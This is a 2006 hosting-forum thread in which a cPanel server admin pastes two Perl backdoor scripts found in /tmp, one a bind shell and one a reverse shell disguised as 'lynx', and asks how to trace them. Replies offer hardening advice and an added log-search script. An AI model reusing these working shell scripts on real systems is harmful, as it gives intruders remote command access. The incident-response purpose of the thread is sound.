The Community Forums

Interact with an entire community of cPanel & WHM users!
bandwidth to the roof: suspicious files in tmp

Discussion in 'General Discussion' started by Secret Agent, Feb 7, 2006.

Thread Status:
Not open for further replies.
  1. Secret Agent

    Secret Agent Guest

    #!/usr/bin/perl
    $SHELL="/bin/bash -i";
    if (@ARGV < 1) { exit(1); }
    $LISTEN_PORT=$ARGV[0];
    use Socket;
    $protocol=getprotobyname('tcp');
    socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
    setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
    bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
    listen(S,3) || die "Cant listen port\n";
    while(1)
    {
    accept(CONN,S);
    if(!($pid=fork))
    {
    die "Cannot fork" if (!defined $pid);
    open STDIN,"<&CONN";
    open STDOUT,">&CONN";
    open STDERR,">&CONN";
    exec $SHELL || die print CONN "Cant execute $SHELL\n";
    close CONN;
    exit 0;
    }
    }



    filename: /tmp/bdpl


    root@server2 [~]# stat /tmp/bdpl
    File: `/tmp/bdpl'
    Size: 612 Blocks: 8 IO Block: 4096 regular file
    Device: 700h/1792d Inode: 1242 Links: 1
    Access: (0644/-rw-r--r--) Uid: ( 99/ nobody) Gid: ( 99/ nobody)
    Access: 2006-02-07 16:26:35.000000000 -0600
    Modify: 2006-02-02 13:26:10.000000000 -0600
    Change: 2006-02-02 13:26:10.000000000 -0600


    root@server2 [~]# grep bdpl /usr/local/apache/domlogs/*
    -bash: /bin/grep: Argument list too long



    #!/usr/bin/perl
    use Socket;
    $cmd= "lynx";
    $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
    $0=$cmd;
    $target=$ARGV[0];
    $port=$ARGV[1];
    $iaddr=inet_aton($target) || die("Error: $!\n");
    $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto=getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr) || die("Error: $!\n");
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    open(STDERR, ">&SOCKET");
    system($system);
    close(STDIN);
    close(STDOUT);
    close(STDERR);

    file name: /tmp/back


    root@server2 [/tmp]# stat /tmp/back
    File: `/tmp/back'
    Size: 541 Blocks: 8 IO Block: 4096 regular file
    Device: 700h/1792d Inode: 415 Links: 1
    Access: (0644/-rw-r--r--) Uid: ( 99/ nobody) Gid: ( 99/ nobody)
    Access: 2006-02-07 16:30:55.000000000 -0600
    Modify: 2006-02-03 12:13:14.000000000 -0600
    Change: 2006-02-03 12:13:14.000000000 -0600

    root@server2 [/tmp]# grep back /usr/local/apache/domlogs/*
    -bash: /bin/grep: Argument list too long


    Bandwidth spike screenshot attached

    How do I trace this and stop it? I also have iptraf installed.

    Specs:
    CentOS 4.2
    cPanel 10.x
    PHP 4.4.2
    Apache 1.33
    Suexec enabled

    Some security measures to name a few:

    APF
    BFD
    LSM
    SIM
    MOD_DOSEVASIVE
    RKHUNTER
    CHKROOTKIT
    SECURED TMP
     

    Attached Files: ss.gif (7.4 KB)
  2. elliotcooper

    elliotcooper Well-Known Member
    PartnerNOC

    Joined:
    May 18, 2005
    The file is almost certainly a DOS script that has been dumped into /tmp and/or /var/tmp by a badly coded PHP script. You should kill all the processes, as they are chewing up your bandwidth and making someone else's life hard as well.

    If you grep your logs for any wgets or inclusions from some free site providers (geocities.com seems to be a popular choice), you will probably find the user responsible for the script that is being hijacked.

    The easiest method to avoid this is to implement mod_sec with the default rule set, as this will screen most of the malicious URLs before they can dump these files into your /tmp and /var/tmp.
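    The log search elliotcooper suggests, applied to the original poster's situation: a bare glob over /usr/local/apache/domlogs failed with "Argument list too long", so the script below walks the directory with find and hands file names to grep through xargs in batches, then prefixes each hit with the log file (i.e. the domain) it came from. It also lists any shebang scripts sitting in the tmp directories. This is an added example for this thread, not code from any poster or from cPanel; the domlogs path comes from the thread, the indicator pattern is an assumption based on the hints in this thread, and the log lines and file names in the demo are constructed samples.

```shell
#!/bin/sh
# Added example for this thread (not code from any poster or from cPanel).
# Purpose: find which site's access log carries the request that dropped a
# script into /tmp, using find | xargs so that a directory holding thousands
# of domlogs does not trigger "Argument list too long" the way a bare glob does.
# Assumptions: domlogs live under /usr/local/apache/domlogs (path from the
# thread); the indicator pattern, sample log lines and sample file names below
# are constructed for demonstration.

DOMLOGS="${DOMLOGS:-/usr/local/apache/domlogs}"

# Indicators worth searching for (assumed, based on the thread): fetch tools in
# a query string, remote inclusions from a free hosting provider, or the names
# of the dropped files themselves.
INDICATOR='(wget|curl|http://[^ "]*geocities\.com|bdpl|/tmp/back)'

# grep_logs DIR PATTERN
# find emits NUL-separated file names; xargs invokes grep in batches small
# enough for the kernel's argv limit. grep -H prefixes each hit with the log
# file name, which here is the domain whose script was abused.
grep_logs() {
    find "$1" -type f -print0 2>/dev/null | xargs -0 grep -H -E "$2" 2>/dev/null
}

# count_hits DIR PATTERN -> number of matching log lines, as a bare integer
count_hits() {
    grep_logs "$1" "$2" | wc -l | tr -d ' '
}

# list_scripts DIR -> regular files under DIR whose first line is a shebang.
# A script of any owner sitting in a world-writable tmp directory deserves a look.
list_scripts() {
    find "$1" -type f -print0 2>/dev/null | xargs -0 grep -l '^#!' 2>/dev/null
}

# make_sample_logs -> path of a temp dir holding two constructed domlogs;
# only the first line of example.com references an indicator.
make_sample_logs() {
    d=$(mktemp -d)
    printf '%s\n' \
      '10.0.0.1 - - [07/Feb/2006:16:20:01 -0600] "GET /index.php?page=http://www.geocities.com/example/bdpl.txt HTTP/1.1" 200 512' \
      '10.0.0.2 - - [07/Feb/2006:16:21:05 -0600] "GET /images/logo.gif HTTP/1.1" 200 3044' \
      > "$d/example.com"
    printf '%s\n' \
      '10.0.0.3 - - [07/Feb/2006:16:22:10 -0600] "GET /about.html HTTP/1.1" 200 1200' \
      > "$d/other.com"
    echo "$d"
}

# scan_server: run both checks against the real directories on the box
scan_server() {
    echo "== shebang scripts in /tmp and /var/tmp =="
    list_scripts /tmp
    list_scripts /var/tmp
    echo "== domlog lines referencing the indicators =="
    grep_logs "$DOMLOGS" "$INDICATOR"
}

case "${1:-}" in
    scan) scan_server ;;
    demo) d=$(make_sample_logs); grep_logs "$d" "$INDICATOR"; rm -rf "$d" ;;
esac
```

    Run it as `sh findropper.sh demo` to see it work on the constructed logs, or `sh findropper.sh scan` on the server itself; the domain in the `file:line` prefix of each hit is the account whose PHP script needs fixing, and the source IP and request in that line show what was fetched.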
     
  3. aromal

    aromal Registered

    Joined:
    Sep 5, 2002
    If your server doesn't host any PHP applications that use Zend Optimizer, then you can install Hardened-PHP on your server, which can prevent many vulnerabilities in the existing PHP code.

    If you are running any version <= 4.3.11, make sure you upgrade to the latest version, 4.4.2, as the older versions are very vulnerable to attacks.

    Also enable mod_security on the server and add rules that can prevent SQL injection, cross-site scripting and buffer overflow attacks.

    Also check whether SYN cookies are enabled on the server to guard against DDoS.

    cat /proc/sys/net/ipv4/tcp_syncookies

    It should show 1; if not, you can use sysctl to enable it.
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Please don't dig up old threads.
     